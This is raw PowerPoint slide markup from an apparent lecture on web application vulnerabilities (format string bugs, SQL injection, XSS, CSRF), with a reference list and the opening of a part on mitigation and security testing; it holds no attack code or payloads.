              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>FSB,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="3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SQLI</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Some vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>unobservable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-44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600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>behaviors</a:t>
            </a:r>
            <a:endParaRPr sz="26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295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2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>XSS,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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CSRF</a:t>
            </a:r>
            <a:endParaRPr sz="24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293873" y="616711"/>
            <a:ext cx="532130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45" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>security vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>trend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492250" y="6190741"/>
            <a:ext cx="68567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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://info.cenzic.com/rs/cenzic/images/Cenzic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐Application‐  Vulnerability‐Trends‐Report‐2013.pdf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600200" y="1828800"/>
            <a:ext cx="7086600" cy="360349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094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:fld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111244" y="616711"/>
            <a:ext cx="1837689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5" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>es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40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17640" y="1398524"/>
            <a:ext cx="8201025" cy="2976245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="40005" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="287020" marR="144780" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1730"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="315"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="266700" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Dowd, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>McDonald, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Schuh, The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Art of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security Assessment, Addision‐  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wesley </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>publications,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2007.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1730"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="299085" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Aleph One, “Smashing the Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for Fun </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Profit,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Phrack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Magazine, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>7, Issue</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-275" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>49,  November </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1996, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Accessed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="280" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://insecure.org/stf/smashstack.html.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="1007110" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1730"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="295910" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Scut/team </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>teso, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>"Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Format </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities," </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2001, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Accessed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://doc.bughunter.net/format</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐string/exploit‐fs.html</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="13970" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1730"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="308610" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Halfond, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Viegas, and A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Orso, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Classification of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL‐Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Countermeasures,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proc. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Symp. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Engineering , </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Virginia,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USA, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>March</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2006.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299720" indent="-287020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="300355" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cross Site Scripting,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‐site_Scripting_(XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="312420" indent="-299720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="313055" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Online </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>BookStore </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Application,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-170" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.gotocode.com/apps.asp?app_id=3</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="300990" indent="-288290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="301625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JSP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Blog,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://jspblog.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr sz="16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146302" y="893318"/>
            <a:ext cx="740600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00" spc="-20" dirty="0"/>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-5" dirty="0"/>
              <a:t>II: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-15" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-5" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-15" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-10" dirty="0"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-10" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="290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41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1451102" y="1613408"/>
            <a:ext cx="298513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7815" algn="l"/>
                <a:tab pos="298450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-21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testing</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
                <a:tab pos="298450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-229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generation</a:t>
            </a:r>
            <a:endParaRPr sz="24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668521" y="692911"/>
            <a:ext cx="256921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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>testing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42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93902" y="1383206"/>
            <a:ext cx="7667625" cy="3850004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71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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-229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ignored?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509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30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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50%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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project</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Sommerville</a:t>
